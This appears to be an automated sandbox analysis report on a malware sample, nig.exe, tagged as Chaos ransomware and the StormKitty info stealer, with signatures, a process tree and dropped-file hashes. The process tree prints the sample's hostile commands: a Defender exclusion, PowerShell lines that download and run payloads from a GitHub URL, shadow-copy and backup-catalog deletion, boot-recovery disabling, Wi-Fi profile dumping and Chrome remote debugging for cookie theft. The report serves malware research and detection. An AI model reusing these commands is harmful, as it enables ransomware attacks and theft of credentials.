Analysis

  • max time kernel
    37s
  • max time network
    39s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250313-en
  • resource tags

    arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    22/03/2025, 02:29

General

  • Target

    nig.exe

  • Size

    57KB

  • MD5

    16edd47bf01716b24958a0b3a3a7bcfb

  • SHA1

    8b7972f4190c2ca9d600084611e966fa0f899b98

  • SHA256

    568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8

  • SHA512

    9e6ca1cbfa194aff3aebb60fa7b73ee4ff63f9770cfe1d114b757d55693278ccb8f6a450235255a3ae03ac382b528b899eb973d571523fe12e3910b9568d38e1

  • SSDEEP

    768:d5qkvPJg++TldUQJbxc1knPItshRGibgFfYTrTQc1mRdJcWvFM79yipBvSrrCeao:3rPJVKjbcknWSOYvTfkWkFM79yQVFu/

Malware Config

Signatures

  • Chaos

    Ransomware family first seen in June 2021.

  • Chaos Ransomware 2 IoCs
  • Chaos family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 2 IoCs
  • Stormkitty family
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Downloads MZ/PE file 2 IoCs
  • Uses browser remote debugging 2 TTPs 5 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Drops desktop.ini file(s) 64 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 1 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies registry class 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs net.exe
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 63 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\nig.exe
    "C:\Users\Admin\AppData\Local\Temp\nig.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4732
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\755F.tmp\7560.tmp\7561.bat C:\Users\Admin\AppData\Local\Temp\nig.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2568
      • C:\Windows\system32\net.exe
        net session
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3120
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 session
          4⤵
            PID:4716
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4676
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"
          3⤵
          • Blocklisted process makes network request
          • Downloads MZ/PE file
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3940
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/kernelv.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\kernelv.exe\" -ErrorAction Stop"
          3⤵
          • Blocklisted process makes network request
          • Downloads MZ/PE file
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5208
        • C:\Users\Admin\AppData\Local\Temp\build.exe
          "C:\Users\Admin\AppData\Local\Temp\build.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3268
          • C:\Users\Admin\AppData\Roaming\svchost.exe
            "C:\Users\Admin\AppData\Roaming\svchost.exe"
            4⤵
            • Drops startup file
            • Executes dropped EXE
            • Drops desktop.ini file(s)
            • Sets desktop wallpaper using registry
            • Modifies registry class
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5020
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
              5⤵
                PID:1476
                • C:\Windows\system32\vssadmin.exe
                  vssadmin delete shadows /all /quiet
                  6⤵
                  • Interacts with shadow copies
                  PID:3184
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic shadowcopy delete
                  6⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5872
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                5⤵
                  PID:4768
                  • C:\Windows\system32\bcdedit.exe
                    bcdedit /set {default} bootstatuspolicy ignoreallfailures
                    6⤵
                    • Modifies boot configuration data using bcdedit
                    PID:6012
                  • C:\Windows\system32\bcdedit.exe
                    bcdedit /set {default} recoveryenabled no
                    6⤵
                    • Modifies boot configuration data using bcdedit
                    PID:5232
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                  5⤵
                    PID:2652
                    • C:\Windows\system32\wbadmin.exe
                      wbadmin delete catalog -quiet
                      6⤵
                      • Deletes backup catalog
                      PID:5660
                  • C:\Windows\system32\NOTEPAD.EXE
                    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\readme.txt
                    5⤵
                    • Opens file in notepad (likely ransom note)
                    PID:288
              • C:\Users\Admin\AppData\Local\Temp\kernelv.exe
                "C:\Users\Admin\AppData\Local\Temp\kernelv.exe"
                3⤵
                • Executes dropped EXE
                • Accesses Microsoft Outlook profiles
                • System Location Discovery: System Language Discovery
                • Checks processor information in registry
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                • outlook_office_path
                • outlook_win_path
                PID:1972
                • C:\Windows\SysWOW64\cmd.exe
                  "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • System Network Configuration Discovery: Wi-Fi Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:3992
                  • C:\Windows\SysWOW64\chcp.com
                    chcp 65001
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:3600
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh wlan show profile
                    5⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    • System Network Configuration Discovery: Wi-Fi Discovery
                    PID:1128
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr All
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:6016
                • C:\Windows\SysWOW64\cmd.exe
                  "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:6004
                  • C:\Windows\SysWOW64\chcp.com
                    chcp 65001
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:4452
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh wlan show networks mode=bssid
                    5⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:5588
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                  4⤵
                  • Uses browser remote debugging
                  • Drops file in Windows directory
                  • Enumerates system info in registry
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of WriteProcessMemory
                  PID:2188
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff502adcf8,0x7fff502add04,0x7fff502add10
                    5⤵
                      PID:1860
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1964,i,772867317625329084,4164335906479403685,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=1956 /prefetch:2
                      5⤵
                        PID:5284
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1452,i,772867317625329084,4164335906479403685,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2248 /prefetch:11
                        5⤵
                          PID:3116
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2376,i,772867317625329084,4164335906479403685,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2520 /prefetch:13
                          5⤵
                            PID:6056
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3068,i,772867317625329084,4164335906479403685,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3336 /prefetch:1
                            5⤵
                            • Uses browser remote debugging
                            PID:2316
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3300,i,772867317625329084,4164335906479403685,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3392 /prefetch:1
                            5⤵
                            • Uses browser remote debugging
                            PID:2160
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4216,i,772867317625329084,4164335906479403685,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4236 /prefetch:9
                            5⤵
                            • Uses browser remote debugging
                            PID:6112
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3380,i,772867317625329084,4164335906479403685,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4672 /prefetch:1
                            5⤵
                            • Uses browser remote debugging
                            PID:4812
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
                        3⤵
                        • Hide Artifacts: Ignore Process Interrupts
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:408
                  • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                    "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                    1⤵
                      PID:1588
                    • C:\Windows\system32\vssvc.exe
                      C:\Windows\system32\vssvc.exe
                      1⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:5048
                    • C:\Windows\system32\wbengine.exe
                      "C:\Windows\system32\wbengine.exe"
                      1⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:6064
                    • C:\Windows\System32\vdsldr.exe
                      C:\Windows\System32\vdsldr.exe -Embedding
                      1⤵
                        PID:6008
                      • C:\Windows\System32\vds.exe
                        C:\Windows\System32\vds.exe
                        1⤵
                        • Checks SCSI registry key(s)
                        PID:6040

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\2012_x64_1_vcRuntimeAdditional_x64.log

                        Filesize

                        1B

                        MD5

                        d1457b72c3fb323a2671125aef3eab5d

                        SHA1

                        5bab61eb53176449e25c2c82f172b82cb13ffb9d

                        SHA256

                        8a8de823d5ed3e12746a62ef169bcf372be0ca44f0a1236abc35df05d96928e1

                        SHA512

                        ca63c07ad35d8c9fb0c92d6146759b122d4ec5d3f67ebe2f30ddb69f9e6c9fd3bf31a5e408b08f1d4d9cd68120cced9e57f010bef3cde97653fed5470da7d1a0

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

                        Filesize

                        40B

                        MD5

                        1d6d1e773c2cb63516dc875f48b6b40c

                        SHA1

                        80bcca5dd15ffceb74ffe8b17a31e5d46da41473

                        SHA256

                        2e7ec8cb08e6856724817c7e0a64c9f38118ceb1c4c79f751ac31640a9e230d1

                        SHA512

                        becd167da74904fbdf8540b4d3782bc20c4f8551afa7c6261d1a8fff797bb160a5e3334bef30dc79a4d5416700055623e3f279e8b4c4bc4c0041bc49d16cb119

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\000003.log

                        Filesize

                        87B

                        MD5

                        e4a639b9d8bf7a90cc97bb4e05a36753

                        SHA1

                        676facdabf06e5f014e95218bfc02b8c18c39284

                        SHA256

                        79da0e95b23e5777bee595201fead887021d71ddaffa79dac8d5cf03a646b8cd

                        SHA512

                        4a254245e0af42a2a86647ed24301f4f82a72c0dedad67df32317c2acdb8a7f2e5db8336871611419776e6a1cc1c35933cc5f4cb16648b51b6a401a14087d104

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                        Filesize

                        2B

                        MD5

                        d751713988987e9331980363e24189ce

                        SHA1

                        97d170e1550eee4afc0af065b78cda302a97674c

                        SHA256

                        4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                        SHA512

                        b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\000003.log

                        Filesize

                        3KB

                        MD5

                        46239bd975531c9499d4a7b2b74d2a9d

                        SHA1

                        727bb16f48ad10836ed4498e5b5f06383a11b56b

                        SHA256

                        c894fd41e011830d9217270cd0f34e1d0d242ddbaee4dd8b7a9bd1d010dfd543

                        SHA512

                        5a6790fadc439e32a026f3c1493939fe8ebc2405228a9b7ce44f130e2c555ad16e7c4c1f8ab3db515e1855b5f9c61b42b463ebd34bc23fed667f7372ffc44a9c

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log

                        Filesize

                        289B

                        MD5

                        541c42f1c98b3e1b011d22eba854e707

                        SHA1

                        db30188de1f22e3077e7044be1386a5d0ecaed9d

                        SHA256

                        0768e811c51ac61a8e573ac6b53f89dbb1d89eb2fcf62536a9a5f730329c584b

                        SHA512

                        47828c1b40deb8d37d6ff4fc8f7673fbb59b40e07f54f0fa4121b91941160134c251e20f7f28f7ee5185f3c8aee2b7e95a1bef573bc64c68912016accbe90604

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log

                        Filesize

                        17KB

                        MD5

                        4786cf24e3e07c212272a4c2c0aa6aad

                        SHA1

                        6948ce944e1dde09aafee35b61b7fee15537a785

                        SHA256

                        01637344a86333f59012fe115b1be0a8366587e176809918a2723a6878a23cdc

                        SHA512

                        6434ad876770eb4bb9e91c4ebb206c41f3b4d0d715ec363c8669d4b595fdd740ac3004855d482c71588f1f7bd4762d427974a4fce31dc50ad633d84d4f132654

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000003.log

                        Filesize

                        1KB

                        MD5

                        56220f7b661c85b776763c1a0f189326

                        SHA1

                        64e8d4898867dafa9de8b87862808a1ac05a1239

                        SHA256

                        6371d04275f796eebfdf9ab3c879f32a58af4cb04001598b8d109836b864b872

                        SHA512

                        3071338a1f5c80016f409105efd2367baa4f3742bdaaf41a97794f66670f246ff24f3c11c2fc26e5d33c17f33c3d19a2301fcf4be8ca239f0a903c3b8a2892db

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                        Filesize

                        80KB

                        MD5

                        cc50af13ee0c561d894eed8b17edfad3

                        SHA1

                        aa1747bbb687a0db699398fb5d3172ad9dd10743

                        SHA256

                        c54b3da8b2aa67cafd041342fcde020981d6bd8815cc77922a8ef4c8beb2ac33

                        SHA512

                        e2ff0790446ef2699fa1760b204a17ff5ee35086c4e344edf21aaad9f902b9e58932c99044fe73d7838f1e62db4d950dc887db043a6360cd3d7619663718f4fe

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\build.exe.log

                        Filesize

                        226B

                        MD5

                        4ae344179932dc8e2c6fe2079f9753ef

                        SHA1

                        60eacc624412b1f34809780769e3b212f138ea9c

                        SHA256

                        3063de3898a9b34e19f8cf0beeec2b8bd6bd05896b52abd73f4703d07b8a7cd4

                        SHA512

                        fadfe2b83f1af8fdc50430325f69d6172d2c1e889ca3800b3b83e5535d5970c32e9a176b48563275a0630d56c96d9f88df148fd6b2d281f0fc58129e5f4dba19

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                        Filesize

                        2KB

                        MD5

                        627073ee3ca9676911bee35548eff2b8

                        SHA1

                        4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                        SHA256

                        85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                        SHA512

                        3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        944B

                        MD5

                        2e8eb51096d6f6781456fef7df731d97

                        SHA1

                        ec2aaf851a618fb43c3d040a13a71997c25bda43

                        SHA256

                        96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864

                        SHA512

                        0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        1KB

                        MD5

                        765bc526389d1c3c6b24939610edf073

                        SHA1

                        a90843728a41cac4d1cb27db24cfe3e1d1883770

                        SHA256

                        c7a6dd86804fa75544c220669c4e44db094b48cc615b4eeada0fdf887450aea9

                        SHA512

                        d4ae996bc26e285d23f256a947e6ccf17de49b70d4a078a4f349a2a1a5625f4e2bd7f2efd548a94db72a39e685b6af559e8c671e57b5d7feb4bd0d0484c82085

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        1KB

                        MD5

                        d057703d5a9ab9259469130b501e63f4

                        SHA1

                        4ab7ee5f3fc41ddd9a0df6e2833dee335825db5d

                        SHA256

                        a59409f996c24a5093a52a1a9deafaf674dade18bae41a6c2ef4b615870a71a9

                        SHA512

                        032a463d998befa5dcd7faaf18521685a481a52bb7d79ea1a046ef0e250875f95898fcf6a1ed58e3c41ba8830d50f8da33f8e57892892b328934c056449e944a

                      • C:\Users\Admin\AppData\Local\Temp\212.102.63.147.zip

                        Filesize

                        406KB

                        MD5

                        3735edaa1493149cd9fd006f073ec41b

                        SHA1

                        d32f88528b618edc291e82da40af49eb4272aafc

                        SHA256

                        e01e422bced67444752377f08dd9e214dc08f733ecfabae219a12c4f831699e7

                        SHA512

                        4eecdd4d350324725a6c9ffbd470c24ac9cb9a364db105b3165746bc33057d7166ce036db0126222b34da73c7fa80bc426e203a5c387a167fa20e41ebf6674f7

                      • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Firefox\FirefoxBookmarks.txt

                        Filesize

                        81B

                        MD5

                        ea511fc534efd031f852fcf490b76104

                        SHA1

                        573e5fa397bc953df5422abbeb1a52bf94f7cf00

                        SHA256

                        e5fe7f327ae62df007bd1117aa7f522dbbcd371ec67953f66d786424cb1d7995

                        SHA512

                        f7d8e575a2332b0fbd491b5e092b7ed6b0942a5165557fcc5d215d873b05103aa6ba01843133871c1c7ac81b10182a15895be49885c98d1a379dd55f88004fae

                      • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\DesktopScreenshot.png

                        Filesize

                        407KB

                        MD5

                        e0adf0867e8554540a148a8c8f32531a

                        SHA1

                        3b7be665430a3fbf0188ab4266f969bcda4b5f75

                        SHA256

                        74c1586a8ceb214c5fd7900963ac8161c204f53e6796bec0ef277edc0299fab6

                        SHA512

                        4ae50aafadedfcde66fd7ae2870be72abfbc84731b25dfe2fb0821fd43c619f8026d0b83909ee2bbca1bd6c7b395fbc5c7394c5bd62ced928019a4eef81fb5d3

                      • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Info.txt

                        Filesize

                        354B

                        MD5

                        6aefe93fdfd9eb14b8cce9dc57cd4a01

                        SHA1

                        4c02dccf4f95a806c1dbb3b52adcfc12e43ee6cf

                        SHA256

                        ed4dd5866fb162b785c728695026db166d0172aac6be52224bd96c7cd6b9cc0f

                        SHA512

                        d693e21225879d36bcd09b5a885c9f145771fd0f6d01713e67afb3aa376a9ece2aa856d721104c777a63b257c17410e1810879bc4b21e55e00c305df18f841ac

                      • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Process.txt

                        Filesize

                        4KB

                        MD5

                        1ae41b785ff43616d6884b29feb2fded

                        SHA1

                        3b9097d8668185e70992d6d6b8bae269366d6573

                        SHA256

                        f7a74b1130983dc5d5dad2f8f2960165f4ec9d82dadf2e914d1d30bd958c5477

                        SHA512

                        005b15ae9ceefb9e383d56ea372781a8183e2ea49bcf1ac088b0087cacc5d7f096c33b11f91cf0440a05e658c5c7a80e9a543addad719c8196b05ac67e019c1c

                      • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Process.txt

                        Filesize

                        5KB

                        MD5

                        b581b6dcea702e0259e77d32ccfc4b45

                        SHA1

                        a9f71d34d6ed1568db1e792823128ff3631d22c2

                        SHA256

                        5e974eb1087612334bd17e8ae543406ac5f03d7fc9a1f9bc4bf24793b87cb994

                        SHA512

                        4a4a32ecc3d03709ed123bba716db26698f9f6fe518a330494b8765e3c2629753c5ecef7c269dac0045444e6fe6b14f4761b230d25ef41c44e9c6d9dc98ded77

                      • C:\Users\Admin\AppData\Local\Temp\755F.tmp\7560.tmp\7561.bat

                        Filesize

                        2KB

                        MD5

                        1c935ef28fdfd394b770d945d7f04d76

                        SHA1

                        29e251c3c40ce4ad1b2984bf26b444aa045d9b21

                        SHA256

                        aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681

                        SHA512

                        a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1

                      • C:\Users\Admin\AppData\Local\Temp\Extra.zip

                        Filesize

                        2KB

                        MD5

                        a3ad1912a8da0ccb4995ad05b6794663

                        SHA1

                        b130888a375301a74adf672dd4a2067fedd4895c

                        SHA256

                        c1044a49f991beea34b34fb75d3274d49ac1333170744e3371caf69b4bf7f38a

                        SHA512

                        20a9e6cefff544cc2e63931c11aab561b58e34505d97d57c4de295be8cc17f91f7cb63b2e0569948682407ef27011362898d361ea78160bfc772c385330d7df7

                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wvi0vson.u2w.ps1

                        Filesize

                        60B

                        MD5

                        d17fe0a3f47be24a6453e9ef58c94641

                        SHA1

                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                        SHA256

                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                        SHA512

                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                      • C:\Users\Admin\AppData\Local\Temp\build.exe

                        Filesize

                        137KB

                        MD5

                        7605fb5c749eeea0b1b27fdaad78051c

                        SHA1

                        28388bf016af085bbcbacf8c516853942f6ec8d3

                        SHA256

                        466a92e378a95752870abddd6af278fba89c5fef2cb3adfe2c4c114b9bd7cd93

                        SHA512

                        1a3780652e092bd0be5c45cf034b2d0737324009c4d7d74e5cca193f75f285be85fa1631a68c6955566206dc3d51ba2dab9c4acfc74f9652ed2c04976ae3ee54

                      • C:\Users\Admin\AppData\Local\Temp\kernelv.exe

                        Filesize

                        211KB

                        MD5

                        b6054dbe4ed853c2e35291f045a632ba

                        SHA1

                        1355fbe1ea1f6bb566921f04512f78590c4b0e41

                        SHA256

                        b58d783278e142a6242ff79712a1af504098c9a930271419bbf381caf45e29c4

                        SHA512

                        648e714669a3434c68091e23c2921f1b535fff0c43402ea57b8c3903282ea885c43f57746772a23674abaf80885aa52b99ece38663f4c0200a9ee9823a752da0

